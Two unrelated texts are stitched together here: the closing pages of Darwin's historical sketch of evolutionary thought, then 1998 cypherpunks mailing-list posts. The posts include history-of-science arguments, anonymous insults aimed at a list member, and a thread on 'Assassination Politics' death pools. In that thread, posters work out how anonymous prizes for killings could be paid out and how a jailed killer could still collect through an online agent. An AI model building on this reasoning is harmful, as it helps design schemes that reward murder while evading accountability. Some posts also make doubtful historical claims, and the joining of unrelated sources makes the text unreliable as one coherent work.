>    paper was not published until his famous 'Two Essays upon Dew and
>    Single Vision' appeared in 1818. In this paper he distinctly
>    recognises the principle of natural selection, and this is the first
>    recognition which has been indicated; but he applies it only to the
>    races of man, and to certain characters alone. After remarking that
>    negroes and mulattoes enjoy an immunity from certain tropical
>    diseases, he observes, firstly, that all animals tend to vary in some
>    degree, and, secondly, that agriculturists improve their domesticated
>    animals by selection; and then, he adds, but what is done in this
>    latter case 'by art, seems to be done with equal efficacy, though more
>    slowly, by nature, in the formation of varieties of mankind, fitted
>    for the country which they inhabit. Of the accidental varieties of
>    man, which would occur among the first few and scattered inhabitants
>    of the middle regions of Africa, some one would be better fitted than
>    the others to bear the diseases of the country. This race would
>    consequently multiply, while the others would decrease; not only from
>    their inability to sustain the attacks of disease, but from their
>    incapacity of contending with their more vigorous neighbours. The
>    colour of this vigorous race I take for granted, from what has been
>    already said, would be dark. But the same disposition to form
>    varieties still existing, a darker and a darker race would in the
>    course of time occur: and as the darkest would be the best fitted for
>    the climate, this would at length become the most prevalent; if not
>    the only race, in the particular country in which it had originated.'
>    He then extends these same views to the white inhabitants of colder
>    climates. I am indebted to Mr Rowley, of the United States, for having
>    called my attention, through Mr Brace, to the above passage in Dr
>    Wells' work.
>    
>    The Hon. and Rev. W. Herbert, afterwards Dean of Manchester, in the
>    fourth volume of the 'Horticultural Transactions,' 1822, and in his
>    work on the 'Amaryllidaceae' (1837, pp. 19, 339), declares that
>    'horticultural experiments have established, beyond the possibility of
>    refutation, that botanical species are only a higher and more
>    permanent class of varieties.' He extends the same view to animals.
>    The Dean believes that single species of each genus were created in an
>    originally highly plastic condition, and that these have produced,
>    chiefly by intercrossing, but likewise by variation, all our existing
>    species.
>    
>    In 1826 Professor Grant, in the concluding paragraph in his well-known
>    paper ('Edinburgh philosophical journal,' vol. xiv. p. 283) on the
>    Spongilla, clearly declares his belief that species are descended from
>    other species, and that they become improved in the course of
>    modification. This same view was given in his 55th Lecture, published
>    in the 'Lancet' in 1834.
>    
>    In 1831 Mr Patrick Matthew published his work on 'Naval Timber and
>    Arboriculture,' in which he gives precisely the same view on the
>    origin of species as that (presently to be alluded to) propounded by
>    Mr Wallace and myself in the 'Linnean journal,' and as that enlarged
>    in the present volume. Unfortunately the view was given by Mr Matthew
>    very briefly in scattered passages in an Appendix to a work on a
>    different subject, so that it remained unnoticed until Mr Matthew
>    himself drew attention to it in the 'Gardener's Chronicle,' on April
>    7th, 1860. The differences of Mr Matthew's view from mine are not of
>    much importance; he seems to consider that the world was nearly
>    depopulated at successive periods, and then re-stocked; and he gives
>    as an alternative, that new forms may be generated ' without the
>    presence of any mould or germ of former aggregates.' I am not sure
>    that I understand some passages; but it seems that he attributes much
>    influence to the direct action of the conditions of life. He clearly
>    saw, however, the full force of the principle of natural selection.
>    
>    The celebrated geologist and naturalist, Von Buch, in his excellent
>    'Description physique des Isles Canaries' (1836, p. 147), clearly
>    expresses his belief that varieties slowly become changed into
>    permanent species, which are no longer capable of intercrossing.
>    
>    Rafinesque, in his 'New Flora of North America,' published in 1836,
>    wrote (p. 6) as follows:- 'All species might have been varieties once,
>    and many varieties are gradually becoming species by assuming constant
>    and peculiar characters'; but farther on (p. 18) he adds, 'except the
>    original types or ancestors of the genus.'
>    
>    In 1843-44 Professor Haldeman ('Boston journal of Nat. Hist. U.
>    States, vol. iv. p. 468) has ably given the arguments for and against
>    the hypothesis of the development and modification of species: he
>    seems to lean towards the side of change.
>    
>    The 'Vestiges of Creation' appeared in 1844. In the tenth and much
>    improved edition (1853) the anonymous author says (p. 155):- 'The
>    proposition determined on after much consideration is, that the
>    several series of animated beings, from the simplest and oldest up to
>    the highest and most recent, are, under the providence of God, the
>    results, first, of an impulse which has been imparted to the forms of
>    life, advancing them, in definite times, by generation, through grades
>    of organisation terminating in the highest dicotyledons- and
>    vertebrata, these grades being few in number, and generally marked by
>    intervals of organic character, which we find to be a practical
>    difficulty in ascertaining affinities; second, of another impulse
>    connected with the vital forces, tending, in the course of
>    generations, to modify organic structures in accordance with external
>    circumstances, as food, the nature of the habitat, and the meteoric
>    agencies, these being the ''adaptations'' of the natural theologian.'
>    The author apparently believes that organisation progresses by sudden
>    leaps, but that the effects produced by the conditions of life are
>    gradual. He argues with much force on general grounds that species are
>    not immutable productions. But I cannot see how the two supposed
>    'impulses' account in a scientific sense for the numerous and
>    beautiful co-adaptations which we see throughout nature; I cannot see
>    that we thus gain any insight how, for instance, a woodpecker has
>    become adapted to its peculiar habits of Life. The work, from its
>    powerful and brilliant style, though displaying in the earlier
>    editions little accurate knowledge and a great want of scientific
>    caution, immediately had a very wide circulation. In my opinion it has
>    done excellent service in this country in calling attention to the
>    subject, in removing prejudice, and in thus preparing the ground for
>    the reception of analogous views.
>    
>    In 1846 the veteran geologist N. J. d'Omalius d'Halloy published in an
>    excellent though short paper ("Bulletins de l'Acad. Roy Bruxelles,'
>    tom. xiii. p. 581) his opinion that it is more probable that new
>    species have been produced by descent with modification than that they
>    have been separately created: the author first promulgated this
>    opinion in 1831.
>    
>    Professor Owen, in 1849 ('Nature of Limbs,' p. 86), wrote as follows:-
>    "The archetypal idea was manifested in the flesh under diverse such
>    modifications, upon this planet, long prior to the existence of those
>    animal species that actually exemplify it. To what natural laws or
>    secondary causes the orderly succession and progression of such
>    organic phenomena may have been committed, we, as yet, are ignorant.'
>    In his Address to the British Association, in 1858, he speaks (p. li.)
>    of "the axiom of the continuous operation of creative power, or of the
>    ordained becoming of living things.' Farther on (p. xc.), after
>    referring to geographical distribution, he adds, 'These phenomena
>    shake our confidence in the conclusion that the Apteryx of New Zealand
>    and the Red Grouse of England were distinct creations in and for those
>    islands respectively. Always, also, it may be well to bear in mind
>    that by the word ''creation'' the zoologist means '"a process he knows
>    not what.'' He amplifies this idea by adding that when such cases as
>    that of the Red Grouse are enumerated by the zoologists as evidence of
>    distinct creation of the bird in and for such islands, he chiefly
>    expresses that he knows not how the Red Grouse came to be there, and
>    there exclusively; signifying also, by this mode of expressing such
>    ignorance, his belief that both the bird and the islands owed their
>    origin to a great first Creative Cause.' If we interpret these
>    sentences given in the same Address, one by the other, it appears that
>    this eminent philosopher felt in 1858 his confidence shaken that the
>    Apteryx and the Red Grouse first appeared in their respective homes,
>    'he knew not how,' or by some process 'he knew not what.'
>    
>    This Address was delivered after the papers by Mr Wallace and myself
>    on the Origin of Species, presently to be referred to, had been read
>    before the Linnean Society. When the first edition of this work was
>    published, I was so completely deceived, as were many others, by such
>    expressions as 'the continuous operation of creative power,' that I
>    included Professor Owen with other palaeontologists as being firmly
>    convinced of the immutability of species; but it appears ('Anat. of
>    Vertebrates,' vol. iii. p. 796) that this was on my part a
>    preposterous error. In the last edition of this work I inferred, and
>    the inference still seems to me perfectly just, from a passage
>    beginning with the words 'no doubt the type-form,' &c. (Ibid. vol. i.
>    p. xxxv.), that Professor Owen admitted that natural selection may
>    have done something in the formation of a new species; but this it
>    appears (Ibid. vol. nl. p. 798) is inaccurate and without evidence. I
>    also gave some extracts from a correspondence between Professor Owen
>    and the Editor of the 'London Review,' from which it appeared manifest
>    to the Editor as well as to myself, that Professor Owen claimed to
>    have promulgated the theory of natural selection before I had done so;
>    and I expressed my surprise and satisfaction at this announcement; but
>    as far as it is possible to understand certain recently published
>    passages (Ibid. vol. iii. p. 798) I have either partially or wholly
>    again fallen into error. It is consolatory to me that others find
>    Professor Owen's controversial writings as difficult to understand and
>    to reconcile with each other, as I do. As far as the mere enunciation
>    of the principle of natural selection is concerned, it is quite
>    immaterial whether or not Professor Owen preceded me, for both of us,
>    as shown in this historical sketch, were long ago preceded by Dr Wells
>    and Mr Matthews.
>    
>    M. Isidore Geoffroy Saint-Hilaire, in his lectures delivered in 1850
>    (of which a Rsum appeared in the 'Revue et Nag. de Zoolog.,' Jan.
>    1851), briefly gives his reason for believing that specific characters
>    "sont fixs, pour chaque espce, tant qu'elle se perptue au milieu
>    des mmes circonstances: ils se modifient, si les circonstances
>    ambiantes viennent  changer.' 'En rsum, l'observation des animaux
>    sauvages dmontre dj la variabilit limit des espces. Les
>    expriences sur les animaux sauvages devenus domestiques, et sur les
>    animaux domestiques redevenus sauvages, la dmontrent plus clairement
>    encore. Ces memes expriences prouvent, de plus, que les diffrences
>    produites peuvent etre de valeur gnrique.' In his 'Hist. Nat.
>    Gnral (tom. ii. p. 430, 1859) he amplifies analogous conclusions.
>    
>    From a circular lately issued it appears that Dr Freke, in 1851
>    ("Dublin Medical Press,' p. 322), propounded the doctrine that all
>    organic beings have descended from one primordial form. His grounds of
>    belief and treatment of the subject are wholly different from mine;
>    but as Dr Freke has now (1861) published his Essay on the 'Origin of
>    Species by means of Organic Affinity,' the difficult attempt to give
>    any idea of his views would be superfluous on my part.
>    
>    Mr Herbert Spencer, in an Essay (originally published in the 'Leader,'
>    March, 1852, and republished in his 'Essays,' in 1858), has contrasted
>    the theories of the Creation and the Development of organic beings
>    with remarkable skill and force. He argues from the analogy of
>    domestic productions, from the changes which the embryos of many
>    species undergo, from the difficulty of distinguishing species and
>    varieties, and from the principle of general gradation, that species
>    have been modified; and he attributes the modification to the change
>    of circumstances. The author (1855) has also treated psychology on the
>    principle of the necessary acquirement of each mental power and
>    capacity by gradation.
>    
>    In 1852 M. Naudin, a distinguished botanist, expressly stated, in an
>    admirable paper on the Origin of Species ('Revue Horticole, p. 102;
>    since partly republished in the 'Nouvelles Archives du Musum,' tom.
>    i. p. 171), his belief that species are formed in an analogous manner
>    as varieties are under cultivation; and the latter process he
>    attributes to man's power of selection. But he does not show how
>    selection acts under nature. He believes, like Dean Herbert, that
>    species, when nascent, were more plastic than at present. He lays
>    weight on what he calls the principle of finality, 'puissance
>    mystrieuse, indtermine; fatalit pour les uns; pour les autres
>    volont providentielle, dont l'action incessante sur les tres vivants
>    dtermine,  toutes les poques de l'existence du monde, la forme, le
>    volume, et la dure de chacun d'eux, en raison de sa destine dans
>    l'ordre de choses dont il fait partie. C'est cette puissance qui
>    harmonise chaque membre  l'ensemble, en l'appropriant  la fonction
>    qu'il doit remplir dans l'organisme gnral de la nature, fonction qui
>    est pour lui sa raison d'tre.'(3)
>    
>    In 1853 a celebrated geologist, Count Keyserling ("Bulletin de la Soc.
>    Golog.,' 2nd Ser., tom. x. p. 357), suggested that as new diseases,
>    supposed to have been caused by some miasma, have arisen and spread
>    over the world, so at certain periods the germs of existing species
>    may have been chemically affected by circumambient molecules of a
>    particular nature, and thus have given rise to new forms.
>    
>    In this same year, 1853, Dr Schaaffhausen published an excellent
>    pamphlet ('Verhand. des Naturhist. Vereins der preuss. Rheinlands,'
>    &c.), in which he maintains the development of organic forms on the
>    earth. He infers that many species have kept true for long periods,
>    whereas a few have become modified. The distinction of species he
>    explains by the destruction of intermediate graduated forms. 'Thus
>    living plants and animals are not separated from the extinct by new
>    creations, but are to be regarded as their descendants through
>    continued reproduction.'
>    
>    A well-known French botanist, M. Lecoq, writes in 1854 ('Etudes sur
>    Gograph. Bot.,' tom. i. p. 250), 'On voit que nos recherches sur la
>    fixit ou la variation de l'espce, nous conduisent directement aux
>    ides mises, par deux hommes justement clbres, Geoffroy
>    Saint-Hilaire et Goethe.' Some other passages scattered through M.
>    Lecoq's large work, make it a little doubtful how far he extends his
>    views on the modification of species.
>    
>    The 'Philosophy of Creation' has been treated in a masterly manner by
>    the Rev. Baden Powell, in his "Essays on the Unity of Worlds,' 1855.
>    Nothing can be more striking than the manner in which he shows that
>    the introduction of new species is "a regular, not a casual
>    phenomenon,' or, as Sir John Herschel expresses it, 'a natural in
>    contradistinction to a miraculous, process.'
>    
>    The third volume of the "Journal of the Linnean Society' contains
>    papers, read July 1st, 1858, by Mr Wallace and myself, in which, as
>    stated in the introductory remarks to this volume, the theory of
>    Natural Selection is promulgated by Mr Wallace with admirable force
>    and clearness.
>    
>    Von Baer, towards whom all zoologists feel so profound a respect,
>    expressed about the year 1859 (see Prof. Rudolph Wagner, a
>    "Zoologisch-Anthropologische Untersuchungen,' 1861, s. 51) his
>    conviction, chiefly grounded on the laws of geographical distribution,
>    that forms now perfectly distinct have descended from a single
>    parent-form.
>    
>    In June, 1859, Professor Huxley gave a lecture before the Royal
>    Institution on the 'Persistent Types of Animal Life.' Referring to
>    such cases, he remarks, "It is difficult to comprehend the meaning of
>    such facts as these, if we suppose that each species of animal and
>    plant, or each great type of organisation, was formed and placed upon
>    the surface of the globe at long intervals by a distinct act of
>    creative power; and it is well to recollect that such an assumption is
>    as unsupported by tradition or revelation as it is opposed to the
>    general analogy of nature. If, on the other hand, we view 'Persistent
>    Types' in relation to that hypothesis which supposes the species
>    living at any time to be the result of the gradual modification of
>    pre-existing species a hypothesis which, though unproven, and sadly
>    damaged by some of its supporters, is yet the only one to which
>    physiology lends any countenance; their existence would seem to show
>    that the amount of modification which living beings have undergone
>    during geological time is but very small in relation to the whole
>    series of changes which they have suffered.'
>    
>    In December, 1859, Dr Hooker published his 'Introduction to the
>    Australian Flora.' In the first part of this great work he admits the
>    truth of the descent and modification of species, and supports this
>    doctrine by many original observations.
>    
>    The first edition of this work was published on November 24th, 1859,
>    and the second edition on January 7th, 1860.
>    
>    Footnotes
>    
>    (1) Aristotle, in his 'Physicae Auscultationes' (lib. 2, cap. 8, s.
>    2), after remarking that rain does not fall in order to make the corn
>    grow, any more than it falls to spoil the farmer's corn when threshed
>    out of doors, applies the same argument to organization: and adds (as
>    translated by Mr Clair Grece, who first pointed out the passage to
>    me), 'So what hinders the different parts [of the body] from having
>    this merely accidental relation in nature? as the teeth, for example,
>    grow by necessity, the front ones sharp, adapted for dividing, and the
>    grinders flat, and serviceable for masticating the food; since they
>    were not made for the sake of this, but it was the result of accident.
>    And in like manner as to the other parts in which there appears to
>    exist an adaptation to an end. Wheresoever, therefore, all things
>    together (that is all the parts of one whole) happened like as if they
>    were made for the sake of something, these were preserved, having been
>    appropriately constituted by an internal spontaneity, and whatsoever
>    things were not thus constituted, perished, and still perish. We here
>    see the principle of natural selection shadowed forth, but how little
>    Aristotle fully comprehended the principle, is shown by his remarks on
>    the formation of the teeth.
>    
>    (2) I have taken the date of the first publication of Lamarck from
>    Isid. Geoffroy Saint-Hilaire's ('Hist. Nat. Gnrale,' tom. ii. p.
>    405, 1859) excellent history of opinion on this subject. In this work
>    a full account is given of Buffon's conclusions on the same subject.
>    It is curious how largely my grandfather, Dr Erasmus Darwin,
>    anticipated the views and erroneous grounds of opinion of Lamarck in
>    his 'Zoonomia' (vol. i. pp. 500-510), published in 1794. According to
>    Isid. Geoffroy there is no doubt that Goethe was an extreme partisan
>    of similar views, as shown in the Introduction to a work written in
>    1794 and 1795, but not published till long afterwards: he has
>    pointedly remarked ('Goethe als Naturforscher,' von Dr Karl Medinge s.
>    34) that the future question for naturalists will be how, for
>    instance, cattle got their horns, and not for what they are used. It
>    is rather a singular instance of the manner in which similar views
>    arise at about the same time, that Goethe in Germany, Dr Darwin in
>    England, and Geoffroy Saint-Hilaire (as we shall immediately see) in
>    France; came to the same conclusion on the origin of species, in the
>    years 1794-5.
>    
>    (3) From references in Bronn's 'Untersuchungen ber die
>    Entwickenlungs-Gesetze,' it appears that the celebrated botanist and
>    palaeontologist Unger published, in 1852, his belief that species
>    undergo development and modification. Dalton, likewise, in Pander and
>    Dalton's work on Fossil Sloths, expressed, in 1821 a similar belief.
>    Similar views have, as is well known, been maintained by Oken in his
>    mystical 'Natur-philosophie.' From other references in Godron's work
>    'Sur l'Espce,' it seems that Bory St Vincent, Burdach, Poiret, and
>    Fries, have all admitted that new species are continually being
>    produced.
>    
>    I may add, that of the thirty-four authors named in this Historical
>    Sketch, who believe in the modification of species, or at least
>    disbelieve in separate acts of creation, twenty-seven have written on
>    special branches of natural history or geology.
>    
>    
>    Contents 
>    Introduction
>    
>    
>    
>    
>    
>    
>    Home Page | Browse | Search | Feedback | Links
>    The FAQ | Must-Read Files | Index | Creationism | Evolution | Age of
>    the Earth | Flood Geology | Catastrophism | Debates
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 9 Jan 1998 14:42:09 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801090707.BAA07580@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 08 Jan 1998 22:06:38 -0800
> From: Blanc <blancw@cnw.com>
> Subject: Re: rant on the morality of confidentiality 

> BTW, you should consider that when Einstein proposed the creation of a
> bomb, it was within the context of a war being advanced globally by an evil
> madman who was gathering every resource to subdue and decimate everything
> in his way, and that the rest of the world was desperate for a solution.

Um, actualy Einstein didn't propose a bomb. I believe Leo Szilard approached
Einstein with a letter asking the President to begin an initiative. The
motivation was because most of the really worthwhile German physicists
working on the Nazi programs left the Nazi sphere. The fear was that since
Germany had the *only* supply of heavy water in the world and the only state
backed program in the field that if the US didn't do something they would
loose the bomb in a series of bright flashes. I also, don't believe the
war had actualy started when Einstein was approaced by Leo on Aug. 2, 1939.

> Also you should remember that some brilliant people, like Newton, who was a
> shy man and didn't necessarily see himself as others did/do, did not care
> if anyone else saw the results of his work.

He certainly went to great pains to publish it, even anonymously in some
cases and out of his own pocket.

> Once he had solved the
> problems in his own mind, he was not exceptionally concerned that others
> were also struggling with the same, nor whether "the community" needed the
> answer.   He was pursuing knowledge for reasons of his own. 

He pursued knowledge for deep religous reasons, according to his notes.
Newton was also the Exchequer of England and had 3 peopled hanged for
stealing gold from the government mint. He took the job because he had pissed
so many people off at the time because of his attitude that he couldn't find
work. It was prior to him becoming know as the 'Lion of England' and gaining
life tenure.



    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 9 Jan 1998 15:07:38 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801090731.BAA07695@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: rant on the morality of confidentiality (fwd)
> From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> Date: Thu, 08 Jan 98 23:45:25 EST
> 
> Janos Bolyai was the son of the math professor Farkas B. in Buda(best).

Who also worked with Gauss and probably beat Gauss to any solution to the
problem of non-euclidean geometry (see Kurzer Grundriss eines Versuchs, 
p. 46).

> In 1832 he published his findings as an appendix
> to his father's textbook.

Actualy his father published it as an afterthought to get him to quit
working on Euclids Parallels. It was published in Tomus Secundus (1833,
pp. 265 - 322) written by his father.

> arises if you omit this axiom. According to my sources, the appendix
> is "Wronski-like" to the point of unreadability. Apparently no one
> actually read it until B. started arguing about who did what first.

Both John Bolyai's "The Science of Absolute Space" and Nicholas
Lobachevski's "The Theory of Parallels" are included in Roberto Bonola's
"Non-euclidean Geometry" (Dover, ISBN 0-486-60027-0 $5.50). I certainly had
no problem reading the 3 combined books.

I was just looking at the translators notes to Lobachevski, it was done
by George Bruce Halsted of 2407 San Marcos St, Austin, Tx. May 1, 1891.

> well accepted by his peers. Neither Bolyai nor Lobachevsky knew about
> Gauss's work.

Not true, Bolyai wrote him several letters as described in his book and the
various prefaces. Lobachevski's book was promoted by Gauss as the first and
truely critical work on non-euclidean geometry. In a rare show of magnamity
Gauss even admits that Lobachevski's work exceeded his own.

> I have no idea what Bonola wrote, but if he's just repeating the allegations
> Bolyai made about Gauss while suffering from depression and paranoia, they
> have no more truth in them than the Timmy May rants on this mailing list.

He wrote a classic work on non-euclidean geometry that was quite popular in
1912 when it was printed.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Fri, 9 Jan 1998 17:56:11 +0800
To: cypherpunks@algebra.com
Subject: Re: [Censored] Quote of the Day (fwd)
Message-ID: <6a88eb4a1c645a0937bc001a779b25d1@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



John Young wrote:

>DPS sumbitch ran me down near DFW, me and my crap filled van,
>my mangy hide and shaggy hair, my NY plates, my wildly dumped
>substances, and sat behind for a few drags of AC in 100 degree heat,
>miked in the number, adjusted his mirrors, tilted the vidcam skyward,
>and climbed out, a big, very big widowmaker high on his fat ass,
>hustled his privates, spat juice, and farted hard enough to quiver the
>VW and me.

I think John has been skipping his meds again. Come on, John, the pill is
your friend!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 9 Jan 1998 10:55:56 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Remailers & N.E.T.
In-Reply-To: <v03007806b0db101f982c@[168.161.105.216]>
Message-ID: <199801090251.DAA10017@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain





On Thu, 8 Jan 1998, Declan McCullagh wrote:

> I would be very afraid of relying on the CDA's immunizing provisions as my
> sole defense against prosecution, conviction, and jail time, were I a
> remailer operator.
Could you clarify what you mean by that?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Fri, 9 Jan 1998 13:47:45 +0800
To: Jrbl Pookah <lists@castle5.castlec.com>
Subject: Re: Encrypted Telephony Products
In-Reply-To: <Pine.LNX.3.95.980105105418.13020A-100000@castle5.castlec.com>
Message-ID: <Pine.BSF.3.96.980109062700.7972A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 5 Jan 1998, Jrbl Pookah wrote:

> 
> 
> 	I've recently begun looking for internet telephony products that
> employ reasonably secure encryption on-the-fly.  Now, I've found Nautilus,
> and PGPFone, but neither product appears to have been updated for quite a
> while now.  I was just wondering if anybody could give me recommendations
> for more up-to-date products, and perhaps comparisons between those
> available.

The most popular encrypting Internet telephony product at the moment is
SpeekFreely. http://www.fourmilab.ch/speakfree/windows/

Have fun,
-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous304@juno.com (Anony J Man)
Date: Fri, 9 Jan 1998 20:17:18 +0800
To: real@freenet.edmonton.ab.ca
Subject: Re: your mail
In-Reply-To: <Pine.A41.3.95.980108135350.27418A-100000@fn2.freenet.edmonton.ab.ca>
Message-ID: <19980109.065815.3334.0.anonymous304@juno.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 8 Jan 1998 13:54:41 -0700 (MST) Graham-John Bullers
<real@freenet.edmonton.ab.ca> writes:
>On Thu, 8 Jan 1998, Mix wrote:
>
>I think Vulis needs each of us to send ten copies of this back to him.

I think so too what's his email address?????



Anonymous304



>> Tim C. May's reheated, refurbished, and regurgitated cud is 
>> completely inappropriate for the mailing lists into which it is 
>> cross-ruminated.
>> 
>>    |     |
>>    |  O  | Tim C. May
>>    (--|--)
>>       |
>>      / \
>> 
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>Graham-John Bullers                      Moderator of 
>alt.2600.moderated   
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>    email : <real@freenet.edmonton.ab.ca> : 
><ab756@freenet.toronto.on.ca>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>         http://www.freenet.edmonton.ab.ca/~real/index.html
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 9 Jan 1998 14:22:48 +0800
To: cypherpunks@toad.com
Subject: Accounts payable
Message-ID: <199801090607.HAA01799@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Timmy C[rook] May is just a poor excuse for an unschooled, retarded thug.

         (_) _____ (_)
            /O   O\   Timmy C[rook] May
           !   I   !
           ! \___/ !
            \_____/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <anon@squirrel.owl.de>
Date: Fri, 9 Jan 1998 17:56:14 +0800
To: cypherpunks@cyberpass.net
Subject: a good example of bad crypto hype
Message-ID: <7e0eaee2121f060fe7825adfc519b545@squirrel>
MIME-Version: 1.0
Content-Type: text/plain



>at http://www.meganet.com/explain.htm
>you can test your critical thinking skills...

Bawahahahaha. That's the biggest bunch of complete bullshit I've read in
years. Thanks, Meganet, you made my night. They must be smoking crack and a
lot of it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Fri, 9 Jan 1998 21:42:54 +0800
To: David Honig <honig@otc.net>
Subject: Re: Jim Bell... lives... on... in... Hollywood!
Message-ID: <tw74t3dixo1.fsf@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



<daemon@ATHENA.MIT.EDU> (David Honig) writes:

> At 10:48 PM 1/7/98 -0800, Sergey Goldgaber wrote:
> >
> >1 - Anonymity is technically feasable.
> >
> >2 - This requirement is a legal necessity.  Otherwise, the organization
> >    may be seen as advocating murder.
> >
> >Obviously, if the "Death Pool" was fully anonymous, there would be
> >no way to tell if the winner had contributed in any way to the death.
> >
> >Thus, I think we may be well on our way to Assasination Politics.
> >
> > - Sergey Goldgaber
> 
> I agree, but "contribute to death" needs to be operationalized.  Here's a
> proposal:
> If a homicide suspect is arrested within N months, they will be isolated
> from the net
> and the owner of the winning ID will have to perform a challenge-response.
> Since
> the suspect couldn't have replied, they are different; if a pair
> collaborated, well,
> when a hit man is caught, his payoff matrix will usually make him turn in
> the client.

Given strong cryptography and something like my current Eternity DDS
almost prototype (a reliable distributed way of selling 
storage-compute-bandwidth being the relevant part), why couldn't the 
incarcerated person have left an agent out on the net to handle the 
challenge for him, and hold the money in anonymous trust for him until
he gets out?  I can't think of any anonymity-preserving system which 
contains an "is-a-person" predicate -- even if you asked an AI-hard
question, you could blind the question and post it to usenet or CNN
or something and quote one of those responses (which would be wise to
do anyway for styleometry prevention).

The other option is having a non-anonymous system, or one that is
anonymous until someone tries to collect the prize, but in that case,
it's not all that interesting a problem.

Ryan the Nightshifted
-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 9 Jan 1998 23:02:50 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801091519.JAA08621@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 09 Jan 1998 00:01:22 -0800
> From: Blanc <blancw@cnw.com>
> Subject: Re: rant on the morality of confidentiality (fwd)

> " His deepest instincts were occult, esoteric, semantic - with profound
> shrinking from the world, a paralyzing fear of exposing his thoughts, his
> beliefs, his discoveries in all nakedness to the inspection and criticism
> of the world.  'Of the most fearful, cautious and suspicious temper that I
> ever knew', said Whiston,

> The too
> well-known conflicts and ignoble quarrels with Hooke, Flamsteed, Leibnitz
> are only too clear an evidence of this.

Would you or Keynes like to explain how such an aloof character could have
had so many 'well-known' conflicts without publishing and discussing his and
others work? How can somebody who supposedly never published have become so
well know? I guess he got somebody else to stand in for him in the various
discourses he partook of at the Royal Society meetings.

> He parted with and published nothing except under the
> extreme pressure of friends.

I would suggest a simple trip to the library and look at what is published
by Newton. If I get the chance I'll take a look and catalog some of the
anonymous publishing that are attributed to him. It may take a while, this
unfortunately can't reside very high on my list of priorities; sorry.

> Until the second phase of his life, he was a
> wrapt, consecrated solitary, pursuing his studies by intenese introspection
> with a mental endurance perhaps never equalled.

Would you or Keynes like to explain exactly how a government employee,
,as the Exchequer or as a Professor of Natural Philosophy (Physics)
would remain solitary? I guess Newton went to the various mints (if memory
serves at the time there were 3) and did his other duties including
presenting cases in court related to theft and counterfeiting by proxy?

> There is the story of how he informed Halley of one of his most fundamental
> discoveries of planetary motion.  'Yes', replied Halley, 'but how do you
> know that?  Have you proved it?'  Newton was taken aback - 'Why, I've known
> it for years', he replied.  'If you'll give me a few days, I'll certainly
> find you a proof of it' - as in due course he did."

Yeah, Halley had just seen the comet and was trying to figure out it's
orbit. He approached many people on the issue and Newton was the only one
who could resolve the issue in England. Because of the long periodicity and
